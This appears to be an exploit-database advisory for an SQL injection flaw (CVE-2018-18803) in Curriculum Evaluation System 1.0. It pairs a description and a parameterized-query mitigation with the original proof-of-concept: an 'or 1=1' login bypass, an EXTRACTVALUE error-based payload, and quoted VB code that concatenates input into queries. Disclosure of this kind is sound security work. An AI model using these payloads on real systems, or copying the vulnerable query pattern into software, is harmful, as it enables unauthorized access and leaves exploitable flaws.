vendor:
Curriculum Evaluation System
by:
Ihsan Sencan
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Curriculum Evaluation System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CVE: CVE-2018-18803
CPE: a:sourcecodester:curriculum_evaluation_system:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows, Linux, Mac
2018

Curriculum Evaluation System 1.0 – SQL Injection

Curriculum Evaluation System 1.0 is vulnerable to SQL injection. An attacker can inject SQL through the 'txtSearch' input handled in 'frmCourse.vb' and through the 'username' and 'pass' parameters of the 'login' routine in 'user.vb', because in both places the user-supplied value is concatenated directly into the query string. This can allow an attacker to bypass authentication and gain access to the application.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Validation and filtering alone are not a sufficient defence, however: the queries should be built with parameterized (prepared) statements that bind the user-supplied values, rather than by string concatenation as in the code shown below, so that the input is never interpreted as part of the SQL text.
Source

Exploit-DB raw data:

# Exploit Title: Curriculum Evaluation System 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/curriculumevaluationsystem_0.zip
# Version: 1.0
# Category: Windows
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18803

# POC: 
# 1)
# User: 'or 1=1 or ''='
# ' AnD EXTRAcTVaLUE(22,CoNCaT(0x5c,veRSion(),(SElECT (ElT(1=1,1))),database()))-- Efe

# POC: 
# 2)
# User: 'or 1=1 or ''='
# Pass: Null
# 
# https://2.bp.blogspot.com/-4O0oZTFkzJE/W9Y4HWcImQI/AAAAAAAAEN4/5P-n-9H6JAQMiN6UpJu340xI4x_-MSjHACLcBGAs/s1600/sql5.png

#[PATH]/frmCourse.vb
#....
#47     Private Sub txtSearch_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtSearch.TextChanged
#48         sql = "Select * From tblcourse WHERE Course Like '%" & txtSearch.Text & "%'"
#49         reloadDtg(sql, dtglist)
#50     End Sub
#....

#[PATH]/includes/user.vb
#....
#05     Public Sub login(ByVal username As Object, ByVal pass As Object)
#06         Try
#07 
#08             con.Open()
#09             reloadtxt("SELECT * FROM `tbluseraccount` WHERE User_name= '" & username & "' and Pass = sha1('" & pass & "')")
#10 
#11 
#12             If dt.Rows.Count > 0 Then
#13                 If dt.Rows(0).Item("UserType") = "Administrator" Then
#14                     MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
#15                     'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
#16                     With Form1
#17                         .tsAddG.Enabled = True
#18                         .tsStudent.Enabled = True
#19                         .tsCurriculum.Enabled = True
#20                         .tsGrades.Enabled = True
#21                         .tsReport.Enabled = True
#22                         .tsUtilities.Enabled = True
#23                         .tsSearchStudent.Enabled = True
#24                         .tsLogin.Image = My.Resources.logout
#25                         .tsLogin.Text = "Logout"
#26                     End With
#27 
#28 
#29                     LoginForm1.Close()
#30 
#31 
#32                 ElseIf dt.Rows(0).Item("UserType") = "Faculty" Then
#33 
#34                     MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
#35                     'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
#36                     With Form1
#37                         .tsAddG.Enabled = True
#38                         .tsStudent.Enabled = True
#39                         .tsCurriculum.Enabled = True
#40                         .tsGrades.Enabled = True
#41                         .tsReport.Enabled = True
#42                         .tsSearchStudent.Enabled = True
#43                         .tsLogin.Image = My.Resources.logout
#44                         .tsLogin.Text = "Logout"
#45                     End With
#46 
#47 
#48 
#49 
#50                     LoginForm1.Close()
#51 
#52 
#53 
#54                 ElseIf dt.Rows(0).Item("UserType") = "Assistant" Then
#55                     MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
#56                     'With Form1
#57                     With Form1
#58                         .tsAddG.Enabled = True
#59                         .tsStudent.Enabled = True
#60                         .tsCurriculum.Enabled = True
#61                         .tsGrades.Enabled = True
#62                         .tsReport.Enabled = True
#63 
#64                         .tsSearchStudent.Enabled = True
#65                         .tsLogin.Image = My.Resources.logout
#66                         .tsLogin.Text = "Logout"
#67                     End With
#68 
#69 
#70                     LoginForm1.Close()
#71                 End If
#72 
#73                 'Form1.UserIdToolStripStatus.Text = dt.Rows(0).Item("UserId")
#74                 'Form1.UserToolStripStatus.Text = dt.Rows(0).Item("Fullname")
#75                 'Form1.StatusStrip1.Visible = True
#76                 'inserting logs
#77                 'sql = "INSERT INTO `tbllogs` (`UserId`, `LogDate`,LogMode) " & _
#78                 '   " VALUES ('" & dt.Rows(0).Item("UserId") & "',Now(),'Logged in')"
#79                 'create(sql)
#80 
#81             Else
#82                 MsgBox("Acount doest not exist!", MsgBoxStyle.Information)
#83             End If
#84         Catch ex As Exception
#85             MsgBox(ex.Message)
#86         End Try
#87         con.Close()
#88         da.Dispose()
#89     End Sub
#....